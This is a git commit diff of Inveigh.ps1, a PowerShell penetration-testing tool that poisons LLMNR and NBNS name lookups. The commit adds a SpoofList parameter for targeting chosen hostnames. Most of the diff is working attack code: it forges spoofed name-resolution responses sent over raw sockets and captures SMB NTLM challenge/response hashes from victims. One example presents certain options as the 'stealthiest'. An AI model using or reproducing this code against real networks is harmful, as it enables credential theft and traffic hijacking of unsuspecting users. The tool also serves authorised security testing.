aboutsummaryrefslogtreecommitdiff
path: root/Scripts/Inveigh.ps1
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2015-10-15 22:49:12 -0400
committerKevin Robertson <robertsonk@gmail.com>2015-10-15 22:49:12 -0400
commit7dc0471f12caa7575d5973d5f8c948cb82aa7097 (patch)
tree75d83bb8e0bd6001dade42c9119a1a8af8f4bea0 /Scripts/Inveigh.ps1
parent26eb88df000e983514a2f7a6e87403dfcb5f5372 (diff)
downloadInveigh-7dc0471f12caa7575d5973d5f8c948cb82aa7097.tar.gz
Inveigh-7dc0471f12caa7575d5973d5f8c948cb82aa7097.zip
Added SpoofList parameter and spoofer improvements
Added the SpoofList parameter for listing specific hostnames to spoof with LLMNR/NBNS. Stopped Inveigh from responding to AAAA LLMNR packets received over IPv4. Fixed a NBNS display bug with 15 characters requests.
Diffstat (limited to 'Scripts/Inveigh.ps1')
-rw-r--r--Scripts/Inveigh.ps1372
1 files changed, 203 insertions, 169 deletions
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index 74dbd39..c918e65 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -26,6 +26,9 @@ Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 =
.PARAMETER Repeat
Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
+.PARAMETER SpoofList
+Default = All: Comma separated list of hostnames to spoof with LLMNR and NBNS.
+
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
@@ -102,7 +105,7 @@ Invoke-Inveigh -IP 192.168.1.10 -HTTP N
Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response.
.EXAMPLE
-Invoke-Inveigh -Repeat N -ForceWPADAuth N
+Invoke-Inveigh -Repeat N -ForceWPADAuth N -SpoofList host1,host2
Execute with the stealthiest options.
.EXAMPLE
@@ -153,6 +156,7 @@ param
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$LLMNR="Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$NBNS="N",
[parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][array]$NBNSTypes=@("00","20"),
+ [parameter(Mandatory=$false)][array]$SpoofList="",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][string]$Challenge="",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][string]$SMBRelay="N",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [IPAddress]$_ })][string]$SMBRelayTarget ="",
@@ -309,6 +313,12 @@ else
$LLMNR_response_message = "- LLMNR spoofing is disabled"
}
+if($SpoofList -and ($LLMNR -eq 'y' -or $NBNS -eq 'y'))
+{
+ $spoof_list_output = $SpoofList -join ","
+ $inveigh.status_queue.add("Spoofing only $spoof_list_output")|Out-Null
+}
+
if($NBNS -eq 'y')
{
$NBNSTypes_output = $NBNSTypes -join ","
@@ -816,7 +826,7 @@ $HTTP_scriptblock =
# Sniffer/Spoofer ScriptBlock - LLMNR/NBNS Spoofer and SMB sniffer
$sniffer_scriptblock =
{
- param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$MachineAccounts,$ForceWPADAuth,$RunTime)
+ param ($LLMNR_response_message,$NBNS_response_message,$IP,$SpooferIP,$SMB,$LLMNR,$NBNS,$NBNSTypes,$SpoofList,$MachineAccounts,$ForceWPADAuth,$RunTime)
$byte_in = New-Object Byte[] 4
$byte_out = New-Object Byte[] 4
@@ -863,7 +873,8 @@ $sniffer_scriptblock =
switch($protocol_number)
{
- 6 { # TCP
+ 6
+ { # TCP
$source_port = DataToUInt16 $binary_reader.ReadBytes(2)
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
$sequence_number = DataToUInt32 $binary_reader.ReadBytes(4)
@@ -874,198 +885,221 @@ $sniffer_scriptblock =
$TCP_checksum = [System.Net.IPAddress]::NetworkToHostOrder($binary_reader.ReadInt16())
$TCP_urgent_pointer = DataToUInt16 $binary_reader.ReadBytes(2)
$payload_bytes = $binary_reader.ReadBytes($total_length - ($header_length + $TCP_header_length))
+
+ switch ($destination_port)
+ {
+ 139
+ {
+ if($SMB -eq 'y')
+ {
+ SMBNTLMResponse $payload_bytes
+ }
+ }
+ 445
+ {
+ if($SMB -eq 'y')
+ {
+ SMBNTLMResponse $payload_bytes
+ }
+ }
+ }
+
+ # Outgoing packets
+ switch ($source_port)
+ {
+ 139
+ {
+ if($SMB -eq 'y')
+ {
+ $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ }
+ }
+ 445
+ {
+ if($SMB -eq 'y')
+ {
+ $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ }
+ }
+ }
}
- 17 { # UDP
+ 17
+ { # UDP
$source_port = $binary_reader.ReadBytes(2)
- $source_port_2 = DataToUInt16 ($source_port)
+ $endpoint_source_port = DataToUInt16 ($source_port)
$destination_port = DataToUInt16 $binary_reader.ReadBytes(2)
$UDP_length = $binary_reader.ReadBytes(2)
- $UDP_length_2 = DataToUInt16 ($UDP_length)
+ $UDP_length_uint = DataToUInt16 ($UDP_length)
[void]$binary_reader.ReadBytes(2)
- $payload_bytes = $binary_reader.ReadBytes(($UDP_length_2 - 2) * 4)
- }
- }
-
- # Incoming packets
- switch ($destination_port)
- {
- 137 { # NBNS
- if($payload_bytes[5] -eq 1)
+ $payload_bytes = $binary_reader.ReadBytes(($UDP_length_uint - 2) * 4)
+
+ # Incoming packets
+ switch ($destination_port)
{
- try
- {
- $UDP_length[0] += 16
+ 137 # NBNS
+ {
+ if($payload_bytes[5] -eq 1 -and $IP -ne $source_IP)
+ {
+ $UDP_length[0] += 16
- [Byte[]] $NBNS_response_data = $payload_bytes[13..$payload_bytes.length]`
- + (0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00)`
- + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
- + (0x00,0x00,0x00,0x00)
+ [Byte[]]$NBNS_response_data = $payload_bytes[13..$payload_bytes.length]`
+ + (0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00)`
+ + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
+ + (0x00,0x00,0x00,0x00)
- [Byte[]] $NBNS_response_packet = (0x00,0x89)`
- + $source_port[1,0]`
- + $UDP_length[1,0]`
- + (0x00,0x00)`
- + $payload_bytes[0,1]`
- + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
- + $NBNS_response_data
+ [Byte[]]$NBNS_response_packet = (0x00,0x89)`
+ + $source_port[1,0]`
+ + $UDP_length[1,0]`
+ + (0x00,0x00)`
+ + $payload_bytes[0,1]`
+ + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
+ + $NBNS_response_data
- $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
- $send_socket.SendBufferSize = 1024
- $destination_point = New-Object Net.IPEndpoint( $source_IP, $source_port_2 )
+ $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
+ $send_socket.SendBufferSize = 1024
+ $destination_point = New-Object Net.IPEndpoint($source_IP,$endpoint_source_port)
- $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
+ $NBNS_query_type = [System.BitConverter]::ToString($payload_bytes[43..44])
- switch ($NBNS_query_type)
- {
- '41-41' {
- $NBNS_query_type = '00'
- }
- '41-44' {
- $NBNS_query_type = '03'
- }
- '43-41' {
- $NBNS_query_type = '20'
- }
- '42-4C' {
- $NBNS_query_type = '1B'
- }
- '42-4D' {
- $NBNS_query_type = '1C'
+ switch ($NBNS_query_type)
+ {
+ '41-41' {
+ $NBNS_query_type = '00'
+ }
+ '41-44' {
+ $NBNS_query_type = '03'
+ }
+ '43-41' {
+ $NBNS_query_type = '20'
+ }
+ '42-4C' {
+ $NBNS_query_type = '1B'
+ }
+ '42-4D' {
+ $NBNS_query_type = '1C'
+ }
+ '42-4E' {
+ $NBNS_query_type = '1D'
+ }
+ '42-4F' {
+ $NBNS_query_type = '1E'
+ }
}
- '42-4E' {
- $NBNS_query_type = '1D'
+
+ $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)])
+ $NBNS_query = $NBNS_query -replace "-00",""
+ $NBNS_query = $NBNS_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
+ $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+ $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+
+ $NBNS_query_string_subtracted = ""
+ $NBNS_query_string = ""
+
+ $n = 0
+
+ do
+ {
+ $NBNS_query_string_sub = (([byte][char]($NBNS_query_string_encoded.Substring($n,1)))-65)
+ $NBNS_query_string_subtracted += ([convert]::ToString($NBNS_query_string_sub,16))
+ $n += 1
}
- '42-4F' {
- $NBNS_query_type = '1E'
+ until($n -gt ($NBNS_query_string_encoded.Length - 1))
+
+ $n = 0
+
+ do
+ {
+ $NBNS_query_string += ([char]([convert]::toint16($NBNS_query_string_subtracted.Substring($n,2),16)))
+ $n += 2
}
- }
-
- if($NBNS -eq 'y')
- {
- if ($NBNSTypes -contains $NBNS_query_type)
- {
- if ($inveigh.IP_capture_list -notcontains $source_IP)
- {
- [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point )
- $send_socket.Close( )
- $NBNS_response_message = "- spoofed response has been sent"
+ until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.length -eq 15)
+
+ if($NBNS -eq 'y')
+ {
+ if($NBNSTypes -contains $NBNS_query_type)
+ {
+ if ((!$Spooflist -or $SpoofList -contains $NBNS_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP)
+ {
+ [void]$send_socket.sendTo( $NBNS_response_packet, $destination_point )
+ $send_socket.Close()
+ $NBNS_response_message = "- spoofed response has been sent"
+ }
+ else
+ {
+ if($SpoofList -notcontains $NBNS_query_string)
+ {
+ $NBNS_response_message = "- $NBNS_query_string not on spoof list"
+ }
+ else
+ {
+ $NBNS_response_message = "- spoof suppressed due to previous capture"
+ }
+ }
}
else
{
- $NBNS_response_message = "- spoof suppressed due to previous capture"
+ $NBNS_response_message = "- spoof not sent due to disabled type"
}
}
- else
- {
- $NBNS_response_message = "- spoof not sent due to disabled type"
- }
- }
-
- $NBNS_query = [System.BitConverter]::ToString($payload_bytes[13..$payload_bytes.length])
- $NBNS_query = $NBNS_query -replace "-00",""
- $NBNS_query = $NBNS_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
- $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
- $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
-
- $NBNS_query_string_subtracted = ""
- $NBNS_query_string = ""
-
- $n = 0
-
- do
- {
- $NBNS_query_string_sub = (([byte][char]($NBNS_query_string_encoded.Substring($n,1)))-65)
- $NBNS_query_string_subtracted += ([convert]::ToString($NBNS_query_string_sub,16))
- $n += 1
+
+ $inveigh.console_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
}
- until($n -gt ($NBNS_query_string_encoded.Length - 1))
-
- $n = 0
-
- do
+ }
+ 5355 # LLMNR
+ {
+ if([System.BitConverter]::ToString($payload_bytes[($payload_bytes.length - 4)..($payload_bytes.length - 3)]) -ne '00-1c') # ignore AAAA for now
{
- $NBNS_query_string += ([char]([convert]::toint16($NBNS_query_string_subtracted.Substring($n,2),16)))
- $n += 2
- }
- until($n -gt ($NBNS_query_string_subtracted.Length - 1))
+ $UDP_length[0] += $payload_bytes.length - 2
- $inveigh.console_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
-
- }
- catch{}
- }
- }
- 139
- {
- if($SMB -eq 'y')
- {
- SMBNTLMResponse $payload_bytes
- }
- }
- 445 { # SMB
- if($SMB -eq 'y')
- {
- SMBNTLMResponse $payload_bytes
- }
- }
- 5355 { # LLMNR
- $UDP_length[0] += $payload_bytes.length - 2
-
- [Byte[]] $LLMNR_response_data = $payload_bytes[12..$payload_bytes.length]
- $LLMNR_response_data += $LLMNR_response_data`
- + (0x00,0x00,0x00,0x1e,0x00,0x04)`
- + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()
+ [byte[]]$LLMNR_response_data = $payload_bytes[12..$payload_bytes.length]
+ $LLMNR_response_data += $LLMNR_response_data`
+ + (0x00,0x00,0x00,0x1e)`
+ + (0x00,0x04)`
+ + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()
- [Byte[]] $LLMNR_response_packet = (0x14,0xeb)`
- + $source_port[1,0]`
- + $UDP_length[1,0]`
- + (0x00,0x00)`
- + $payload_bytes[0,1]`
- + (0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00)`
- + $LLMNR_response_data
+ [byte[]]$LLMNR_response_packet = (0x14,0xeb)`
+ + $source_port[1,0]`
+ + $UDP_length[1,0]`
+ + (0x00,0x00)`
+ + $payload_bytes[0,1]`
+ + (0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00)`
+ + $LLMNR_response_data
- $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
- $send_socket.SendBufferSize = 1024
- $destination_point = New-Object Net.IPEndpoint( $source_IP, $source_port_2 )
+ $send_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::Udp )
+ $send_socket.SendBufferSize = 1024
+ $destination_point = New-Object Net.IPEndpoint($source_IP, $endpoint_source_port)
- if($LLMNR -eq 'y')
- {
- if ($inveigh.IP_capture_list -notcontains $source_IP)
- {
- [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point )
- $send_socket.Close( )
- $LLMNR_response_message = "- spoofed response has been sent"
- }
- else
- {
- $LLMNR_response_message = "- spoof suppressed due to previous capture"
- }
- }
+ $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)])
+ $LLMNR_query = $LLMNR_query -replace "-00",""
+ $LLMNR_query = $LLMNR_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
+ $LLMNR_query_string = New-Object System.String ($LLMNR_query,0,$LLMNR_query.Length)
- $LLMNR_query = [System.BitConverter]::ToString($payload_bytes[13..($payload_bytes.length - 4)])
- $LLMNR_query = $LLMNR_query -replace "-00",""
- $LLMNR_query = $LLMNR_query.Split("-") | FOREACH{ [CHAR][CONVERT]::toint16($_,16)}
- $LLMNR_query_string = New-Object System.String ($LLMNR_query,0,$LLMNR_query.Length)
+ if($LLMNR -eq 'y')
+ {
+ if((!$Spooflist -or $SpoofList -contains $LLMNR_query_string) -and $inveigh.IP_capture_list -notcontains $source_IP)
+ {
+ [void]$send_socket.sendTo( $LLMNR_response_packet, $destination_point )
+ $send_socket.Close( )
+ $LLMNR_response_message = "- spoofed response has been sent"
+ }
+ else
+ {
+ if($SpoofList -notcontains $LLMNR_query_string)
+ {
+ $LLMNR_response_message = "- $LLMNR_query_string not on spoof list"
+ }
+ else
+ {
+ $LLMNR_response_message = "- spoof suppressed due to previous capture"
+ }
+ }
+ }
- $inveigh.console_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
- $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
- }
- }
-
- # Outgoing packets
- switch ($source_port)
- {
- 139 {
- if($SMB -eq 'y')
- {
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
- }
- }
- 445 { # SMB
- if($SMB -eq 'y')
- {
- $NTLM_challenge = SMBNTLMChallenge $payload_bytes
+ $inveigh.console_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+ $inveigh.log.add($inveigh.log_file_queue[$inveigh.log_file_queue.add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+ }
+ }
}
}
}
@@ -1199,7 +1233,7 @@ Function SnifferSpoofer()
$sniffer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$sniffer_powershell.AddScript($sniffer_scriptblock).AddArgument($LLMNR_response_message).AddArgument(
$NBNS_response_message).AddArgument($IP).AddArgument($SpooferIP).AddArgument($SMB).AddArgument(
- $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument(
+ $LLMNR).AddArgument($NBNS).AddArgument($NBNSTypes).AddArgument($SpoofList).AddArgument(
$MachineAccounts).AddArgument($ForceWPADAuth).AddArgument($RunTime) > $null
$sniffer_handle = $sniffer_powershell.BeginInvoke()
}
generated by cgit v1.2.3 (git 2.39.1) at 2025-05-29 10:55:37 +0000